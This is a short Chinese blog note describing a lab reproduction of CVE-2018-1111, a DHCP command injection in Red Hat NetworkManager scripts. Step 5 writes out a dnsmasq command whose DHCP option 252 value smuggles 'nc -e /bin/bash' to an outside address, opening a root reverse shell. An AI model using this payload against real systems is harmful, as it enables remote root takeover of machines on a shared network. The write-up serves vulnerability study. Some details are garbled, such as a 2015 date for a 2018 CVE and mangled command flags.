CVE-2018-1111 DHCP RCE漏洞复现

2019 年 10 月 7 日
筆記

2015年5月，在Red Hat Enterprise Linux（CVE-2018-1111）的多个版本的DHCP客户端软件包提供的NetworkManager脚本中发现了命令注入漏洞，随后，RedHat提供了相应的补丁。当系统使用含有该漏洞的NetworkManager并配置了DHCP协议时，攻击者可以利用一个恶意的DHCP服务器或者本地网络构造的DHCP响应，在该系统上以root权限执行任意命令。

复现步骤：

1.kali配置

2. centos:网络：仅主机模式

3. 关闭虚拟机仅主机模式的DHCP功能

4.卡里下配置dns文件，新建文件，加入如下代码，作为dhcp服务器：

5.kali终端下输入：•dnsmasq-dC dnsmasq.conf –dhcp-option="252,malayke'&nc -e /bin/bash192.168.0.105 4567 #"

6.复现结果

CVE-2018-1111 DHCP RCE漏洞复现

VirMach 便宜 VPS

QNews

CVE-2018-1111 DHCP RCE漏洞复现

分享此文：

Related Posts

2019 最新计算机技能排名出炉：Python 排第三，第一名是…

SpringBoot Spring Security 核心组件 认证流程 用户权限信息获取详细讲解

CVE-2019-1003000-jenkins-RCE复现

IIS6.0 CVE-2017-7269 漏洞复现

VirMach 便宜 VPS

QNews

熱門搜尋

SpringBoot Spring Security 核心组件认证流程用户权限信息获取详细讲解